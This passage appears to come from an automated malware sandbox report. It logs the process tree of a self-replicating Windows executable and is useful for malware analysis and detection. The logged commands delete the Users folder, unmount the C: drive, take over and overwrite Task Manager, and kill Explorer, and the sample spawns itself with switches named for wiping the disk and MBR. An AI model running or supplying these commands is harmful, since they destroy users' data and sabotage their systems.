        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe 1699084438
        9⤵
        
        PID:6292
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:9000
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:9468
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe /autoup 1699084438
        10⤵
        
        PID:6032
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe /autoup 1699084438
        11⤵
        
        PID:8800
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe /killwindows 1699084438
        10⤵
        
        PID:8496
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe /killwindows 1699084438
        11⤵
        
        PID:11392
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:7544
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:12816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe /KillHardDisk 1699084438
        10⤵
        
        PID:11944
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe /KillHardDisk 1699084438
        11⤵
        
        PID:4476
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:2064
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe /killMBR 1699084438
        10⤵
        
        PID:11576
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe /killMBR 1699084438
        11⤵
        
        PID:11792
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe /protect 1699084438
        10⤵
        
        PID:5272
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe /protect 1699084438
        11⤵
        
        PID:5496
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe+46932.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900104.exe
        12⤵
        
        PID:8300
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe /autoup 1699084438
        10⤵
        
        PID:11632
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe /autoup 1699084438
        11⤵
        
        PID:6508
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890010.exe C:\windows\system32\taskmgr.exe
        10⤵
        
        PID:6740
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe /save 1699084438
        6⤵
        
        PID:4692
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe /save 1699084438
        7⤵
        Executes dropped EXE
        
        PID:1960
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe /protect 1699084438
        6⤵
        
        PID:3860
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe /protect 1699084438
        7⤵
        Executes dropped EXE
        
        PID:5132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe+711867.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe
        8⤵
        
        PID:5796
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe 1699084438
        8⤵
        
        PID:6576
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe 1699084438
        9⤵
        
        PID:7416
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:8388
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:8684
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe /autoup 1699084438
        10⤵
        
        PID:9464
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe /autoup 1699084438
        11⤵
        
        PID:10880
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe /killwindows 1699084438
        10⤵
        
        PID:8816
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe /killwindows 1699084438
        11⤵
        
        PID:7076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:9476
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:12468
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        12⤵
        
        PID:13636
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe /KillHardDisk 1699084438
        10⤵
        
        PID:11536
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe /KillHardDisk 1699084438
        11⤵
        
        PID:10300
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:11620
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        12⤵
        
        PID:12972
        
        C:\Windows\system32\mountvol.exe
        
        mountvol c: /d
        13⤵
        
        PID:13380
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe /killMBR 1699084438
        10⤵
        
        PID:11076
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe /killMBR 1699084438
        11⤵
        
        PID:7404
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe /protect 1699084438
        10⤵
        
        PID:6160
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe /protect 1699084438
        11⤵
        
        PID:6860
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe+127906.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900171.exe
        12⤵
        
        PID:9324
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe /autoup 1699084438
        10⤵
        
        PID:6016
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe /autoup 1699084438
        11⤵
        
        PID:6788
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe C:\windows\system32\taskmgr.exe
        10⤵
        
        PID:12600
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890017.exe /autoup 1699084438
        10⤵
        
        PID:11052
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe+115878.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890011.exe
        8⤵
        
        PID:6236
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890011.exe 1699084438
        8⤵
        
        PID:8252
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890011.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890011.exe 1699084438
        9⤵
        
        PID:10084
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe /save 1699084438
        6⤵
        
        PID:5268
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe /save 1699084438
        7⤵
        Executes dropped EXE
        
        PID:5956
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:6020
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:7084
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe+25452.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe
      4⤵
      PID:796
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe 1699084438
      4⤵
      PID:4044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /save 1699084438
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3752
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /save 1699084438
    3⤵
    PID:1972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /protect 1699084438
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1368
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /protect 1699084438
    3⤵
    PID:4932
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe+124184.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe
      4⤵
      PID:4204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /save 1699084438
  2⤵
  PID:1060
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /save 1699084438
    3⤵
    PID:4428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /protect 1699084438
  2⤵
  PID:4288
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /protect 1699084438
    3⤵
    PID:2880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe+711867.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289007.exe
      4⤵
      PID:5536
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289007.exe 1699084438
      4⤵
      PID:6732
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289007.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289007.exe 1699084438
        5⤵
        
        PID:2740
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe+115878.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe
      4⤵
      PID:1208
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe 1699084438
      4⤵
      PID:2868
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe 1699084438
        5⤵
        
        PID:9244
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:9404
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:9632
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe /autoup 1699084438
        6⤵
        
        PID:8508
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe /autoup 1699084438
        7⤵
        
        PID:7132
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe /killwindows 1699084438
        6⤵
        
        PID:2696
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe /killwindows 1699084438
        7⤵
        
        PID:11300
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        8⤵
        
        PID:5268
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        9⤵
        Modifies file permissions
        
        PID:12476
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe /KillHardDisk 1699084438
        6⤵
        
        PID:11968
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe /KillHardDisk 1699084438
        7⤵
        
        PID:12056
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        8⤵
        
        PID:5804
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        8⤵
        
        PID:13024
        
        C:\Windows\system32\mountvol.exe
        
        mountvol c: /d
        9⤵
        
        PID:8660
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe /killMBR 1699084438
        6⤵
        
        PID:9836
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe /killMBR 1699084438
        7⤵
        
        PID:7284
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe /protect 1699084438
        6⤵
        
        PID:1660
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe /protect 1699084438
        7⤵
        
        PID:8440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe+45886.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe
        8⤵
        
        PID:10980
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe /autoup 1699084438
        6⤵
        
        PID:7888
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe /autoup 1699084438
        7⤵
        
        PID:12412
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe C:\windows\system32\taskmgr.exe
        6⤵
        
        PID:12740
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289001.exe /autoup 1699084438
        6⤵
        
        PID:12816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /save 1699084438
  2⤵
  PID:4416
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /save 1699084438
    3⤵
    PID:792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /protect 1699084438
  2⤵
  PID:5276
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /protect 1699084438
    3⤵
    PID:5940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe+710821.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289007.exe
      4⤵
      PID:4440
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289007.exe 1699084438
      4⤵
      PID:8052
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289007.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289007.exe 1699084438
        5⤵
        
        PID:8564
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:8876
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:8224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe+26671.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe
      4⤵
      PID:8848
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe 1699084438
      4⤵
      PID:6800
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe 1699084438
        5⤵
        
        PID:9264
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:9384
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:9604
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe /killwindows 1699084438
        6⤵
        
        PID:2916
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe /killwindows 1699084438
        7⤵
        
        PID:11492
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        8⤵
        
        PID:1660
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        9⤵
        Modifies file permissions
        
        PID:2304
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe /autoup 1699084438
        6⤵
        
        PID:9480
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe /KillHardDisk 1699084438
        6⤵
        
        PID:12020
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe /KillHardDisk 1699084438
        7⤵
        
        PID:5764
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        8⤵
        
        PID:10980
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        8⤵
        
        PID:4472
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe /killMBR 1699084438
        6⤵
        
        PID:5608
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe /killMBR 1699084438
        7⤵
        
        PID:10404
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe /protect 1699084438
        6⤵
        
        PID:5996
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe /protect 1699084438
        7⤵
        
        PID:6504
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe+817680.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890028.exe
        8⤵
        
        PID:6016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890028.exe 1699084438
        8⤵
        
        PID:13368
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe /autoup 1699084438
        6⤵
        
        PID:5640
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe /autoup 1699084438
        7⤵
        
        PID:12300
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe C:\windows\system32\taskmgr.exe
        6⤵
        
        PID:11020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /save 1699084438
  2⤵
  PID:2916
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /save 1699084438
    3⤵
    PID:6196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:6748
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:6572

C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe 1699084438
1⤵
- Executes dropped EXE
PID:5064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe /save 1699084438
  2⤵
  PID:5240
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe
